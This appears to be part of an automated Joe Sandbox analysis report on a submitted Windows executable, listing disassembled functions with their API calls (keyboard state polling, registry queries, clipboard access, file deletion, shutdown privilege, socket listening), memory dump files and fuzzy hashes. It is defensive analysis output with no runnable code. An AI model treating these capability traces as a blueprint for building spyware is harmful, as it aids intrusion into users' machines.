                                                                                        • GetKeyboardState.USER32(?), ref: 00460097
                                                                                        • SetKeyboardState.USER32(?), ref: 00460102
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                        • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                        • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                        • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                        • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                        • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                        • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                                        • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                        • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                                        Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: eabf8d680dfe3cfd2204718e86051aa88e9542fed0f6c3d8dda5e7a0bc609bf0
                                                                                        • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                                        • Opcode Fuzzy Hash: eabf8d680dfe3cfd2204718e86051aa88e9542fed0f6c3d8dda5e7a0bc609bf0
                                                                                        • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                                        Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                        • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                                                        • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                        • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                                                        Function 004637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                          • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0046395E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 4002782344-1173974218
                                                                                        • Opcode ID: 3f11042d7402f236aab81219c2fd7e0d2b8e7b9acbbe4fdc7f8742a531ec0f52
                                                                                        • Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
                                                                                        • Opcode Fuzzy Hash: 3f11042d7402f236aab81219c2fd7e0d2b8e7b9acbbe4fdc7f8742a531ec0f52
                                                                                        • Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A
                                                                                        Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                                        • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                                        • _wcscmp.LIBCMT ref: 0046F484
                                                                                        • _wcscmp.LIBCMT ref: 0046F49F
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                        • String ID: *.*
                                                                                        • API String ID: 713712311-438819550
                                                                                        • Opcode ID: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                                        • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                                                        • Opcode Fuzzy Hash: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                                        • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                                                        Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID: 3cA$_A
                                                                                        • API String ID: 674341424-3480954128
                                                                                        • Opcode ID: e78faa36aaa670d3e74c90531279dcdbbdc0ddd1b193f07645de5fbd43754e7b
                                                                                        • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                                                        • Opcode Fuzzy Hash: e78faa36aaa670d3e74c90531279dcdbbdc0ddd1b193f07645de5fbd43754e7b
                                                                                        • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                                                        Function 00415760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 83fa040c52e89b1426b2cd4f756c92c6ff92b274ac96680d58719fac4f786ac0
                                                                                        • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                                                                                        • Opcode Fuzzy Hash: 83fa040c52e89b1426b2cd4f756c92c6ff92b274ac96680d58719fac4f786ac0
                                                                                        • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                                                                                        Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                        • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                                                        • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                        • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                                                        Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                        • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                                                        • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                        • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                                        Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                        • _memmove.LIBCMT ref: 00450258
                                                                                        • _memmove.LIBCMT ref: 0045036D
                                                                                        • _memmove.LIBCMT ref: 00450414
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1300846289-0
                                                                                        • Opcode ID: 3fe41fb1f1eb7e7116013e4d631d6dbfe21577a4811dd44699d0188900a3cf26
                                                                                        • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                                                        • Opcode Fuzzy Hash: 3fe41fb1f1eb7e7116013e4d631d6dbfe21577a4811dd44699d0188900a3cf26
                                                                                        • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                                                        Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                        • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                          • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorProc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3744519093-0
                                                                                        • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                        • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                        • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                        • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                        Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 99427753-0
                                                                                        • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                        • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                        • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                        • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                        Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                        • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                        • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                        • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                        Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
